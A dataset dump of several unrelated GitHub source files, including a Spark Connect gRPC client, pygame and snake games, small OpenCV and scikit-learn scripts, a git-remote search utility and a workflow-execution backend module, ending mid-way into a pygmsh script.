self.params.get(ChannelBuilder.PARAM_USE_SSL, \"\")\n return value.lower() == \"true\"\n\n @property\n def endpoint(self) -> str:\n return f\"{self.host}:{self.port}\"\n\n @property\n def _token(self) -> Optional[str]:\n return self.params.get(ChannelBuilder.PARAM_TOKEN, None)\n\n @property\n def userId(self) -> Optional[str]:\n \"\"\"\n Returns\n -------\n The user_id extracted from the parameters of the connection string or `None` if not\n specified.\n \"\"\"\n return self.params.get(ChannelBuilder.PARAM_USER_ID, None)\n\n def get(self, key: str) -> Any:\n \"\"\"\n Parameters\n ----------\n key : str\n Parameter key name.\n\n Returns\n -------\n The parameter value if present, raises exception otherwise.\n \"\"\"\n return self.params[key]\n\n def toChannel(self) -> grpc.Channel:\n \"\"\"\n Applies the parameters of the connection string and creates a new\n GRPC channel according to the configuration.\n\n Returns\n -------\n GRPC Channel instance.\n \"\"\"\n destination = f\"{self.host}:{self.port}\"\n\n # Setting a token implicitly sets the `use_ssl` to True.\n if not self.secure and self._token is not None:\n use_secure = True\n elif self.secure:\n use_secure = True\n else:\n use_secure = False\n\n if not use_secure:\n return grpc.insecure_channel(destination)\n else:\n # Default SSL Credentials.\n opt_token = self.params.get(ChannelBuilder.PARAM_TOKEN, None)\n # When a token is present, pass the token to the channel.\n if opt_token is not None:\n ssl_creds = grpc.ssl_channel_credentials()\n composite_creds = grpc.composite_channel_credentials(\n ssl_creds, grpc.access_token_call_credentials(opt_token)\n )\n return grpc.secure_channel(destination, credentials=composite_creds)\n else:\n return grpc.secure_channel(destination, credentials=grpc.ssl_channel_credentials())\n\n\nclass MetricValue:\n def __init__(self, name: str, value: Union[int, float], type: str):\n self._name = name\n self._type = type\n self._value = value\n\n def __repr__(self) -> str:\n return f\"<{self._name}={self._value} ({self._type})>\"\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def value(self) -> Union[int, float]:\n return self._value\n\n @property\n def metric_type(self) -> str:\n return self._type\n\n\nclass PlanMetrics:\n def __init__(self, name: str, id: int, parent: int, metrics: List[MetricValue]):\n self._name = name\n self._id = id\n self._parent_id = parent\n self._metrics = metrics\n\n def __repr__(self) -> str:\n return f\"Plan({self._name})={self._metrics}\"\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def plan_id(self) -> int:\n return self._id\n\n @property\n def parent_plan_id(self) -> int:\n return self._parent_id\n\n @property\n def metrics(self) -> List[MetricValue]:\n return self._metrics\n\n\nclass AnalyzeResult:\n def __init__(\n self,\n schema: pb2.DataType,\n explain: str,\n tree_string: str,\n is_local: bool,\n is_streaming: bool,\n input_files: List[str],\n ):\n self.schema = schema\n self.explain_string = explain\n self.tree_string = tree_string\n self.is_local = is_local\n self.is_streaming = is_streaming\n self.input_files = input_files\n\n @classmethod\n def fromProto(cls, pb: Any) -> \"AnalyzeResult\":\n return AnalyzeResult(\n pb.schema,\n pb.explain_string,\n pb.tree_string,\n pb.is_local,\n pb.is_streaming,\n pb.input_files,\n )\n\n\nclass SparkConnectClient(object):\n \"\"\"Conceptually the remote spark session that communicates with the server\"\"\"\n\n def __init__(self, connectionString: str, userId: Optional[str] = None):\n \"\"\"\n Creates a new SparkSession for the Spark Connect interface.\n\n Parameters\n ----------\n connectionString: Optional[str]\n Connection string that is used to extract the connection parameters and configure\n the GRPC connection. Defaults to `sc://localhost`.\n userId : Optional[str]\n Optional unique user ID that is used to differentiate multiple users and\n isolate their Spark Sessions. If the `user_id` is not set, will default to\n the $USER environment. Defining the user ID as part of the connection string\n takes precedence.\n \"\"\"\n # Parse the connection string.\n self._builder = ChannelBuilder(connectionString)\n self._user_id = None\n if self._builder.userId is not None:\n self._user_id = self._builder.userId\n elif userId is not None:\n self._user_id = userId\n else:\n self._user_id = os.getenv(\"USER\", None)\n\n self._channel = self._builder.toChannel()\n self._stub = grpc_lib.SparkConnectServiceStub(self._channel)\n\n def register_udf(\n self, function: Any, return_type: Union[str, pyspark.sql.types.DataType]\n ) -> str:\n \"\"\"Create a temporary UDF in the session catalog on the other side. We generate a\n temporary name for it.\"\"\"\n name = f\"fun_{uuid.uuid4().hex}\"\n fun = pb2.CreateScalarFunction()\n fun.parts.append(name)\n fun.serialized_function = cloudpickle.dumps((function, return_type))\n\n req = self._execute_plan_request_with_metadata()\n req.plan.command.create_function.CopyFrom(fun)\n\n self._execute(req)\n return name\n\n def _build_metrics(self, metrics: \"pb2.ExecutePlanResponse.Metrics\") -> List[PlanMetrics]:\n return [\n PlanMetrics(\n x.name,\n x.plan_id,\n x.parent,\n [MetricValue(k, v.value, v.metric_type) for k, v in x.execution_metrics.items()],\n )\n for x in metrics.metrics\n ]\n\n def _to_pandas(self, plan: pb2.Plan) -> \"pandas.DataFrame\":\n req = self._execute_plan_request_with_metadata()\n req.plan.CopyFrom(plan)\n return self._execute_and_fetch(req)\n\n def _proto_schema_to_pyspark_schema(self, schema: pb2.DataType) -> DataType:\n return types.proto_schema_to_pyspark_data_type(schema)\n\n def schema(self, plan: pb2.Plan) -> StructType:\n proto_schema = self._analyze(plan).schema\n # Server side should populate the struct field which is the schema.\n assert proto_schema.HasField(\"struct\")\n\n fields = [\n StructField(\n f.name,\n self._proto_schema_to_pyspark_schema(f.data_type),\n f.nullable,\n )\n for f in proto_schema.struct.fields\n ]\n return StructType(fields)\n\n def explain_string(self, plan: pb2.Plan, explain_mode: str = \"extended\") -> str:\n result = self._analyze(plan, explain_mode)\n return result.explain_string\n\n def execute_command(self, command: pb2.Command) -> None:\n req = self._execute_plan_request_with_metadata()\n if self._user_id:\n req.user_context.user_id = self._user_id\n req.plan.command.CopyFrom(command)\n self._execute(req)\n return\n\n def _execute_plan_request_with_metadata(self) -> pb2.ExecutePlanRequest:\n req = pb2.ExecutePlanRequest()\n req.client_type = \"_SPARK_CONNECT_PYTHON\"\n if self._user_id:\n req.user_context.user_id = self._user_id\n return req\n\n def _analyze_plan_request_with_metadata(self) -> pb2.AnalyzePlanRequest:\n req = pb2.AnalyzePlanRequest()\n req.client_type = \"_SPARK_CONNECT_PYTHON\"\n if self._user_id:\n req.user_context.user_id = self._user_id\n return req\n\n def _analyze(self, plan: pb2.Plan, explain_mode: str = \"extended\") -> AnalyzeResult:\n req = self._analyze_plan_request_with_metadata()\n req.plan.CopyFrom(plan)\n if explain_mode not in [\"simple\", \"extended\", \"codegen\", \"cost\", \"formatted\"]:\n raise ValueError(\n f\"\"\"\n Unknown explain mode: {explain_mode}. Accepted \"\n \"explain modes are 'simple', 'extended', 'codegen', 'cost', 'formatted'.\"\n \"\"\"\n )\n if explain_mode == \"simple\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.SIMPLE\n elif explain_mode == \"extended\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.EXTENDED\n elif explain_mode == \"cost\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.COST\n elif explain_mode == \"codegen\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.CODEGEN\n else: # formatted\n req.explain.explain_mode = pb2.Explain.ExplainMode.FORMATTED\n\n resp = self._stub.AnalyzePlan(req, metadata=self._builder.metadata())\n return AnalyzeResult.fromProto(resp)\n\n def _process_batch(self, arrow_batch: pb2.ExecutePlanResponse.ArrowBatch) -> \"pandas.DataFrame\":\n with pa.ipc.open_stream(arrow_batch.data) as rd:\n return rd.read_pandas()\n\n def _execute(self, req: pb2.ExecutePlanRequest) -> None:\n for b in self._stub.ExecutePlan(req, metadata=self._builder.metadata()):\n continue\n return\n\n def _execute_and_fetch(self, req: pb2.ExecutePlanRequest) -> \"pandas.DataFrame\":\n import pandas as pd\n\n m: Optional[pb2.ExecutePlanResponse.Metrics] = None\n result_dfs = []\n\n for b in self._stub.ExecutePlan(req, metadata=self._builder.metadata()):\n if b.metrics is not None:\n m = b.metrics\n if b.HasField(\"arrow_batch\"):\n pb = self._process_batch(b.arrow_batch)\n result_dfs.append(pb)\n\n assert len(result_dfs) > 0\n\n df = pd.concat(result_dfs)\n\n # pd.concat generates non-consecutive index like:\n # Int64Index([0, 1, 0, 1, 2, 0, 1, 0, 1, 2], dtype='int64')\n # set it to RangeIndex to be consistent with pyspark\n n = len(df)\n df.set_index(pd.RangeIndex(start=0, stop=n, step=1), inplace=True)\n\n # Attach the metrics to the DataFrame attributes.\n if m is not None:\n df.attrs[\"metrics\"] = self._build_metrics(m)\n return df\n","repo_name":"ep-infosec/33_apache_spark","sub_path":"python/pyspark/sql/connect/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72667296892","text":"import pygame\nfrom random import *\n\nfrom telas.Tela_menu import Tela_menu\nfrom telas.Tela_vitoria import Tela_vitoria\nfrom telas.Tela_derrota import Tela_derrota\nfrom telas.Tela_final import Tela_final\nfrom fases.Fase import *\n\nfrom info_fases import info_fases\nfrom multiuso import *\n\n\nclass Jogo:\n def __init__(self):\n pygame.init()\n pygame.mixer.init()\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Ao infinito e além!\")\n \n self.nivel_atual = 4\n self.tela_atual = Tela_menu(self.nivel_atual)\n self.clock = pygame.time.Clock()\n self.fps = 60\n self.fonte = pygame.font.SysFont('Anton', 50)\n self.som_ganhou = pygame.mixer.Sound('Assets/efeitos_sonoros/ganhou.mp3')\n self.som_perdeu = pygame.mixer.Sound('Assets/efeitos_sonoros/perdeu.mp3')\n \n \n def atualiza(self):\n\n self.tela_atual = self.tela_atual.atualiza()\n self.clock.tick(self.fps)\n\n if self.tela_atual is None:\n return False\n \n elif self.tela_atual == \"vitoria\":\n fase_atual, proxima_fase = vitoria(self.nivel_atual)\n self.tela_atual = Tela_vitoria(fase_atual, proxima_fase)\n pygame.mixer.Sound.play(self.som_ganhou)\n \n elif self.tela_atual == \"final\":\n fase_atual = criar_fase(self.nivel_atual)\n self.tela_atual = Tela_final(fase_atual)\n pygame.mixer.Sound.play(self.som_ganhou)\n\n elif self.tela_atual == \"derrota\":\n fase_atual = criar_fase(self.nivel_atual)\n self.tela_atual = Tela_derrota(fase_atual)\n pygame.mixer.Sound.play(self.som_perdeu)\n\n elif self.tela_atual == \"menu\":\n self.tela_atual = Tela_menu(self.nivel_atual)\n \n\n if type(self.tela_atual) is Fase:\n self.nivel_atual = self.tela_atual.nivel\n\n return True\n\n def game_loop(self):\n while self.atualiza():\n self.tela_atual.desenha(self.screen, self.fonte)\n pygame.display.update()\n \n def finaliza(self):\n pygame.quit()","repo_name":"Isabelleatt/ao_infinito_e_alem","sub_path":"Jogo.py","file_name":"Jogo.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31206874900","text":"import pandas as pd\nimport numpy as np\nimport matplotlib as plt\nfrom datetime import datetime\nstartTime = datetime.now()\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\n\ndf = pd.read_csv('Data//IrisDataSet.csv', sep=',')\n#df = pd.read_csv('Data//SampleXTXData.csv', sep=',')\n\nprint(df.describe())\n#print(df.dtypes)\n\ndf.fillna(0, inplace=True)\n\nall_inputs = df[['sepal_length', 'sepal_width', 'petal_length', 'petal_width']].values\nall_classes = df['species'].values\n\n#all_inputs = df[['askRate0','askRate1','askRate2','askRate3','askRate4','askRate5',\\\n# 'askRate6','askRate7','askRate8','askRate9','askRate10','askRate11','askRate12',\\\n# 'askRate13','askRate14','askSize0','askSize1','askSize2','askSize3','askSize4',\\\n# 'askSize5','askSize6','askSize7','askSize8','askSize9','askSize10','askSize11',\\\n# 'askSize12','askSize13','askSize14','bidRate0','bidRate1','bidRate2','bidRate3',\\\n# 'bidRate4','bidRate5','bidRate6','bidRate7','bidRate8','bidRate9','bidRate10',\\\n# 'bidRate11','bidRate12','bidRate13','bidRate14','bidSize0','bidSize1','bidSize2',\\\n# 'bidSize3','bidSize4','bidSize5','bidSize6','bidSize7','bidSize8','bidSize9','bidSize10',\\\n# 'bidSize11','bidSize12','bidSize13','bidSize14']].values\n#all_classes = df['y'].values\n\n\n(train_inputs, test_inputs, train_classes, test_classes) =\\\n train_test_split(all_inputs, all_classes, train_size=0.7, random_state=1)\n\nestimator = DecisionTreeClassifier(criterion='entropy', max_leaf_nodes=3)\nestimator.fit(train_inputs, train_classes)\n\nprint(\"Accuracy: \", estimator.score(test_inputs, test_classes))\nprint(\"--------------------\")\ntreeStructure()\nprint(\"--------------------\")\nprint(datetime.now() - startTime)\n\n","repo_name":"mrodriguez1212/XTXChallenge","sub_path":"ML_Algos_Test/Example_DT_Class.py","file_name":"Example_DT_Class.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44661425","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('1.jpg')\nheight, width = img.shape[:2]\n\nrotation_matrix = cv2.getRotationMatrix2D((height/4, width/4),90, 1)\nrotation_image = cv2.warpAffine(img, rotation_matrix, (width, height))\n\ncv2.imshow('Original', img)\ncv2.imshow('Rotation', rotation_image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"manthan-ladva/Language-Practice","sub_path":"Python/OpenCV Hindi YouTube/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74331763453","text":"import pygame as py\r\nimport math\r\nimport random as rand\r\nimport pickle as pic\r\n\r\ndef addsnbody():\r\n snbod.append(py.Vector2((800,800)))\r\n\r\npy.init()\r\npy.font.init()\r\nmyfont = py.font.SysFont('Comic Sans MS', 15)\r\nrunning = True\r\nscreenh=500\r\nscreenw=500\r\nscreen=py.display.set_mode((screenw,screenh),vsync=0)\r\nsnbod=[]\r\nsnbod.append(py.Vector2())\r\nsnbod[0].x=screenh/2\r\nsnbod[0].y=screenw/2\r\nspeed=12\r\ndir=0\r\nfps=25\r\nfpsclock=py.time.Clock()\r\nsnsize=12\r\nupturn=False\r\nlefturn=True\r\nctr=0\r\nt=()\r\nfcounter=0\r\nappsize=7.5\r\naploc=py.Vector2(800,800)\r\ngameover=False\r\npy.display.set_caption('SNAKEGAME')\r\n\r\n\r\ntry:\r\n f=open(\"sg.bin\",\"rb\")\r\n r=pic.load(f)\r\n hiscore=r[0]\r\n f.close()\r\n \r\nexcept FileNotFoundError:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=0\r\n \r\n f.close\r\n\r\n\r\nwhile True:\r\n \r\n if not gameover:\r\n for event in py.event.get():\r\n if event.type==py.QUIT:\r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n py.quit()\r\n\r\n if event.type == py.KEYDOWN:\r\n if event.key == py.K_UP and upturn:\r\n dir=0\r\n lefturn=True\r\n upturn=False\r\n if event.key == py.K_DOWN and upturn:\r\n dir=1\r\n lefturn=True\r\n upturn=False\r\n if event.key == py.K_LEFT and lefturn:\r\n dir=2\r\n lefturn=False\r\n upturn=True\r\n if event.key == py.K_RIGHT and lefturn:\r\n dir=3\r\n lefturn=False\r\n upturn=True\r\n \r\n if ctr>=0:\r\n t=()\r\n for i in range(0,ctr+1):\r\n x=snbod[i].x\r\n y=snbod[i].y\r\n t+=(py.Vector2((x,y)),)\r\n for i in range(0,ctr+1):\r\n\r\n if i==0:\r\n continue\r\n snbod[i]=t[i-1]\r\n\r\n if fcounter>75:\r\n aploc=py.Vector2(((rand.randint(10,490)),(rand.randint(10,490))))\r\n fcounter=0 \r\n\r\n if dir==0:\r\n snbod[0].y-=speed\r\n if dir==1:\r\n snbod[0].y+=speed\r\n if dir==2:\r\n snbod[0].x-=speed\r\n if dir==3:\r\n snbod[0].x+=speed\r\n\r\n if snbod[0].x> screenw:\r\n snbod[0].x=0\r\n if snbod[0].y>screenh:\r\n snbod[0].y=0\r\n if snbod[0].x<0:\r\n snbod[0].x=screenw\r\n if snbod[0].y<0:\r\n snbod[0].y=screenh\r\n\r\n screen.fill((211,211,211))\r\n screen.blit(myfont.render(\"Score =\"+str(ctr), False, (218,165,32)), (5, 10))\r\n screen.blit(myfont.render(\"HIScore =\"+str(hiscore), False, (218,165,32)), (5, 40))\r\n \r\n if (snbod[0].x < (aploc.x + appsize) and ((snbod[0].x + snsize) > aploc.x) and (snbod[0].y < (aploc.y + appsize) and (snbod[0].y +snsize) >aploc.y)):\r\n ctr+=1\r\n aploc=py.Vector2(((rand.randint(10,490)),(rand.randint(10,490))))\r\n addsnbody()\r\n py.draw.rect(screen,(0,150,0),(snbod[0].x,snbod[0].y,snsize,snsize))\r\n if ctr!=0:\r\n for i in range(1,ctr+1):\r\n py.draw.rect(screen,(0,255,0),(snbod[i].x,snbod[i].y,snsize,snsize))\r\n py.draw.rect(screen,(255,0,0),(aploc.x,aploc.y,appsize,appsize))\r\n py.display.flip()\r\n\r\n \r\n\r\n for i in range(1,len(snbod)):\r\n if snbod[0]==snbod[i]:\r\n \r\n gameover=True\r\n break\r\n else:\r\n \r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n for event in py.event.get():\r\n screen.blit(myfont.render(\"Yuo Ded NOOB\", False, (150,0,0)), (175, 250))\r\n screen.blit(myfont.render(\"Press enter to restart\", False, (150,0,0)), (175, 290))\r\n if event.type==py.QUIT:\r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n py.quit()\r\n\r\n if event.type == py.KEYDOWN:\r\n if event.key == py.K_RETURN:\r\n snbod=[]\r\n snbod.append(py.Vector2((screenw/2,screenw/2)))\r\n ctr=0\r\n dir=0\r\n upturn=False\r\n lefturn=True\r\n gameover=False\r\n py.display.update()\r\n fpsclock.tick(fps)\r\n fcounter+=1 \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yiungyiung/pygame-snakeggame","sub_path":"pysngame/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5629122948","text":"\"\"\"\nThis code goes through every existing file on the mentioned drive and checks for git repositories, and when it finds a repository,\nit runs git remote -v and prints the output onto a output.txt file.\n\nNOTE: change {ENTER_DRIVE_NAME_HERE} to your drive name.\n\"\"\"\n\n\nimport os\nimport subprocess\n# Directory to start searching from\nroot_dir = '{ENTER_DRIVE_NAME_HERE}:\\\\'\n# Search for .git folders\ngit_dirs = []\nfor dirpath, dirnames, filenames in os.walk(root_dir):\n if '.git' in dirnames:\n git_dirs.append(os.path.join(dirpath, '.git'))\n print(f\"Searching {dirpath}...\")\n# Execute command for each git directory\nfor git_dir in git_dirs:\n try:\n # Get parent directory of .git folder\n parent_dir = os.path.abspath(os.path.join(git_dir, os.pardir))\n \n # Add parent directory to safe directories\n subprocess.run(['git', 'config', '--global', '--add', 'safe.directory', parent_dir], check=True)\n \n # Run git remote command and save output to file\n output = subprocess.check_output(['git', '-C', parent_dir, 'remote', '-v'])\n with open('output.txt', 'a') as f:\n f.write(f\"\\n\\n{parent_dir}:\\n{output.decode()}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error while executing command for {parent_dir}: {e}\")\n except Exception as e:\n print(f\"Error while processing {parent_dir}: {e}\")\n","repo_name":"captainion2119/py-utilities","sub_path":"Git-remote-search/git-search.py","file_name":"git-search.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17298256872","text":"\"\"\"Handle execution of transformation revisions.\"\"\"\n\nimport json\nimport logging\nfrom posixpath import join as posix_urljoin\nfrom uuid import UUID, uuid4\n\nimport httpx\nfrom pydantic import BaseModel, Field, ValidationError\n\nfrom hetdesrun.backend.models.info import ExecutionResponseFrontendDto\nfrom hetdesrun.models.component import ComponentNode\nfrom hetdesrun.models.run import (\n ConfigurationInput,\n PerformanceMeasuredStep,\n WorkflowExecutionInput,\n WorkflowExecutionResult,\n)\nfrom hetdesrun.models.wiring import WorkflowWiring\nfrom hetdesrun.models.workflow import WorkflowNode\nfrom hetdesrun.persistence.dbservice.exceptions import DBIntegrityError, DBNotFoundError\nfrom hetdesrun.persistence.dbservice.revision import (\n get_all_nested_transformation_revisions,\n read_single_transformation_revision,\n)\nfrom hetdesrun.persistence.models.transformation import TransformationRevision\nfrom hetdesrun.persistence.models.workflow import WorkflowContent\nfrom hetdesrun.runtime.logging import execution_context_filter\nfrom hetdesrun.runtime.service import runtime_service\nfrom hetdesrun.utils import Type\nfrom hetdesrun.webservice.auth_dependency import get_auth_headers\nfrom hetdesrun.webservice.auth_outgoing import ServiceAuthenticationError\nfrom hetdesrun.webservice.config import get_config\n\nlogger = logging.getLogger(__name__)\nlogger.addFilter(execution_context_filter)\n\n\nclass ExecByIdInput(BaseModel):\n id: UUID # noqa: A003\n wiring: WorkflowWiring | None = Field(\n None,\n description=\"The wiring to be used. \"\n \"If no wiring is provided the stored test wiring will be used.\",\n )\n run_pure_plot_operators: bool = Field(\n False, description=\"Whether pure plot components should be run.\"\n )\n job_id: UUID = Field(\n default_factory=uuid4,\n description=(\n \"Id to identify an individual execution job, \"\n \"will be generated if it is not provided.\"\n ),\n )\n\n\nclass ExecLatestByGroupIdInput(BaseModel):\n \"\"\"Payload for execute-latest kafka endpoint\n\n WARNING: Even when this input is not changed, the execution response might change if a new\n latest transformation revision exists.\n\n WARNING: The inputs and outputs may be different for different revisions. In such a case,\n executing the last revision with the same input as before will not work, but will result in\n errors.\n\n The latest transformation will be determined by the released_timestamp of the released revisions\n of the revision group which are stored in the database.\n\n This transformation will be loaded from the DB and executed with the wiring sent with this\n payload.\n \"\"\"\n\n revision_group_id: UUID\n wiring: WorkflowWiring\n run_pure_plot_operators: bool = Field(\n False, description=\"Whether pure plot components should be run.\"\n )\n job_id: UUID = Field(\n default_factory=uuid4,\n description=\"Optional job id, that can be used to track an execution job.\",\n )\n\n def to_exec_by_id(self, id: UUID) -> ExecByIdInput: # noqa: A002\n return ExecByIdInput(\n id=id,\n wiring=self.wiring,\n run_pure_plot_operators=self.run_pure_plot_operators,\n job_id=self.job_id,\n )\n\n\nclass TrafoExecutionError(Exception):\n pass\n\n\nclass TrafoExecutionNotFoundError(TrafoExecutionError):\n pass\n\n\nclass TrafoExecutionRuntimeConnectionError(TrafoExecutionError):\n pass\n\n\nclass TrafoExecutionResultValidationError(TrafoExecutionError):\n pass\n\n\ndef nested_nodes(\n tr_workflow: TransformationRevision,\n all_nested_tr: dict[UUID, TransformationRevision],\n) -> list[ComponentNode | WorkflowNode]:\n if tr_workflow.type != Type.WORKFLOW:\n raise ValueError\n\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n ancestor_operator_ids = [operator.id for operator in tr_workflow.content.operators]\n ancestor_children: dict[UUID, TransformationRevision] = {}\n for operator_id in ancestor_operator_ids:\n if operator_id in all_nested_tr:\n ancestor_children[operator_id] = all_nested_tr[operator_id]\n else:\n raise DBIntegrityError(\n f\"operator {operator_id} of transformation revision {tr_workflow.id} \"\n f\"not contained in result of get_all_nested_transformation_revisions\"\n )\n\n def children_nodes(\n workflow: WorkflowContent, tr_operators: dict[UUID, TransformationRevision]\n ) -> list[ComponentNode | WorkflowNode]:\n sub_nodes: list[ComponentNode | WorkflowNode] = []\n\n for operator in workflow.operators:\n if operator.type == Type.COMPONENT:\n sub_nodes.append(\n tr_operators[operator.id].to_component_node(\n operator.id, operator.name\n )\n )\n if operator.type == Type.WORKFLOW:\n tr_workflow = tr_operators[operator.id]\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n operator_ids = [\n operator.id for operator in tr_workflow.content.operators\n ]\n tr_children = {\n id_: all_nested_tr[id_]\n for id_ in operator_ids\n if id_ in all_nested_tr\n }\n sub_nodes.append(\n tr_workflow.content.to_workflow_node(\n transformation_id=all_nested_tr[operator.id].id,\n transformation_name=all_nested_tr[operator.id].name,\n transformation_tag=all_nested_tr[operator.id].version_tag,\n operator_id=operator.id,\n operator_name=operator.name,\n sub_nodes=children_nodes(tr_workflow.content, tr_children),\n )\n )\n\n return sub_nodes\n\n return children_nodes(tr_workflow.content, ancestor_children)\n\n\ndef prepare_execution_input(exec_by_id_input: ExecByIdInput) -> WorkflowExecutionInput:\n \"\"\"Loads trafo revision and prepares execution input from it.\n\n Loads the trafo revision specified by id and prepares\n an workflow execution input object which can be executed by the runtime\n -- either code or by calling runtime rest endpoint for running\n workflows.\n\n Note that trafo revisions of type components will be wrapped in\n an ad-hoc workflow structure for execution.\n \"\"\"\n try:\n transformation_revision = read_single_transformation_revision(\n exec_by_id_input.id\n )\n logger.info(\n \"found transformation revision with id %s\", str(exec_by_id_input.id)\n )\n except DBNotFoundError as e:\n raise TrafoExecutionNotFoundError() from e\n\n if transformation_revision.type == Type.COMPONENT:\n tr_workflow = transformation_revision.wrap_component_in_tr_workflow()\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n nested_transformations = {\n tr_workflow.content.operators[0].id: transformation_revision\n }\n else:\n tr_workflow = transformation_revision\n nested_transformations = get_all_nested_transformation_revisions(tr_workflow)\n\n nested_components = {\n tr.id: tr for tr in nested_transformations.values() if tr.type == Type.COMPONENT\n }\n workflow_node = tr_workflow.to_workflow_node(\n operator_id=uuid4(),\n sub_nodes=nested_nodes(tr_workflow, nested_transformations),\n )\n\n execution_input = WorkflowExecutionInput(\n code_modules=[\n tr_component.to_code_module() for tr_component in nested_components.values()\n ],\n components=[\n component.to_component_revision()\n for component in nested_components.values()\n ],\n workflow=workflow_node,\n configuration=ConfigurationInput(\n name=str(tr_workflow.id),\n run_pure_plot_operators=exec_by_id_input.run_pure_plot_operators,\n ),\n workflow_wiring=exec_by_id_input.wiring\n if exec_by_id_input.wiring is not None\n else transformation_revision.test_wiring,\n job_id=exec_by_id_input.job_id,\n )\n return execution_input\n\n\nasync def run_execution_input(\n execution_input: WorkflowExecutionInput,\n) -> ExecutionResponseFrontendDto:\n \"\"\"Runs the provided execution input\n\n Depending on configuration this either calls a function or queries the\n external runtime service endpoint (if this instance is not considered to\n act as runtime service).\n\n Raises subtypes of TrafoExecutionError on errors.\n \"\"\"\n run_execution_input_measured_step = PerformanceMeasuredStep.create_and_begin(\n \"run_execution_input\"\n )\n\n output_types = {\n output.name: output.type for output in execution_input.workflow.outputs\n }\n\n execution_result: WorkflowExecutionResult\n\n if get_config().is_runtime_service:\n execution_result = await runtime_service(execution_input)\n else:\n try:\n headers = await get_auth_headers(external=False)\n except ServiceAuthenticationError as e:\n msg = (\n \"Failed to get auth headers for internal runtime execution request.\"\n f\" Error was:\\n{str(e)}\"\n )\n logger.info(msg)\n raise TrafoExecutionRuntimeConnectionError(msg) from e\n\n async with httpx.AsyncClient(\n verify=get_config().hd_runtime_verify_certs,\n timeout=get_config().external_request_timeout,\n ) as client:\n url = posix_urljoin(get_config().hd_runtime_engine_url, \"runtime\")\n try:\n response = await client.post(\n url,\n headers=headers,\n json=json.loads(\n execution_input.json()\n ), # TODO: avoid double serialization.\n # see https://github.com/samuelcolvin/pydantic/issues/1409 and\n # https://github.com/samuelcolvin/pydantic/issues/1409#issuecomment-877175194\n timeout=None,\n )\n except httpx.HTTPError as e:\n # handles both request errors (connection problems)\n # and 4xx and 5xx errors. See https://www.python-httpx.org/exceptions/\n msg = f\"Failure connecting to hd runtime endpoint ({url}):\\n{str(e)}\"\n logger.info(msg)\n raise TrafoExecutionRuntimeConnectionError(msg) from e\n try:\n json_obj = response.json()\n execution_result = WorkflowExecutionResult(**json_obj)\n except ValidationError as e:\n msg = (\n f\"Could not validate hd runtime result object. Exception:\\n{str(e)}\"\n f\"\\nJson Object is:\\n{str(json_obj)}\"\n )\n logger.info(msg)\n raise TrafoExecutionResultValidationError(msg) from e\n\n execution_response = ExecutionResponseFrontendDto(\n **execution_result.dict(),\n output_types_by_output_name=output_types,\n )\n\n run_execution_input_measured_step.stop()\n\n execution_response.measured_steps.run_execution_input = (\n run_execution_input_measured_step\n )\n return execution_response\n\n\nasync def execute_transformation_revision(\n exec_by_id_input: ExecByIdInput,\n) -> ExecutionResponseFrontendDto:\n \"\"\"Execute transformation revision\n\n raises subtypes of TrafoExecutionError on errors.\n \"\"\"\n\n execution_context_filter.bind_context(job_id=exec_by_id_input.job_id)\n\n # prepare execution input\n\n prep_exec_input_measured_step = PerformanceMeasuredStep.create_and_begin(\n \"prepare_execution_input\"\n )\n\n execution_input = prepare_execution_input(exec_by_id_input)\n\n prep_exec_input_measured_step.stop()\n\n exec_resp_frontend_dto = await run_execution_input(execution_input)\n exec_resp_frontend_dto.measured_steps.prepare_execution_input = (\n prep_exec_input_measured_step\n )\n return exec_resp_frontend_dto\n","repo_name":"hetida/hetida-designer","sub_path":"runtime/hetdesrun/backend/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":12315,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"78"} +{"seq_id":"22963496332","text":"import meshio\nimport pygmsh\nimport pyvista as pv\n\nproject_folder = \"/home/daalgi/tut/fem/aster/00frame\"\n\nwith pygmsh.geo.Geometry() as geom:\n # geom.characteristic_length_max = 0.5\n\n length = 10\n mesh_size = 